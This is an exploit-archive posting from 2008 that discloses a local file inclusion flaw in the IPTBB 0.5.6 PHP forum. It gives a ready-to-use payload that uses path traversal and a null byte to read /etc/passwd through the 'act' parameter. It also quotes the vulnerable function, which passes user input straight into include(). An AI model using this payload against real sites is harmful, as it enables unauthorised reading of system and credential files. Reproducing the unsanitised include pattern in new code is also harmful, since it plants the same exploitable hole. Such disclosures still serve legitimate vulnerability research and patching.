IPTBB 0.5.6 (index.php act) Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IPTBB 0.5.6 (index.php act) Local File Inclusion Vulnerability
# Published : 2008-06-20
# Author : sToRm
# Previous Title : Lightweight News Portal [LNP] 1.0b Multiple Remote Vulnerabilities
# Next Title : CiBlog 3.1 (links-extern.php id) Remote SQL Injection Vulnerability

____       _   _       _ ___   __                        _  __
 / ___| ___ |  | |_   _| |   / /__  _   _ _ __ ___  ___| |/ _| ___  _ __ __ _
| |  _ / _ |  | | | | | | | V / _ | | | | '__/ __|/ _  | |_ / _ | '__/ _` |
| |_| | (_) | |  | |_| | | | | | (_) | |_| | |  __   __/ |  _| (_) | | | (_| |
 ____|___/|_| _|__,_|_|_| |_|___/ __,_|_|  |___/___|_|_|(_)___/|_|  __, |
---------------------------------------------------------------------------|___/
Exploit found by sToRm

IPTBB is a free forum system built using PHP and mysql.
Local File Inclusion

Local File Inclusion
--------------------

index.php?act=../../../../../../etc/passwd%00


function action($page){
	$page="main/".$page.".php";
	//Include the template maker
	//Get the settings
$setting = array();
$sql = mysql_query(" SELECT * FROM `iptbb_settings` ");

while ( $row = mysql_fetch_array( $sql ) ){
	$setting["{$row['name']}"] = $row['value'];
}

	require_once('tpl.class.php');
	$tpl = new template;
	$fileurl = 'templates/';
	$template = $setting['template'] . '/';
	include($page);
}

# www.Syue.com [2008-06-20]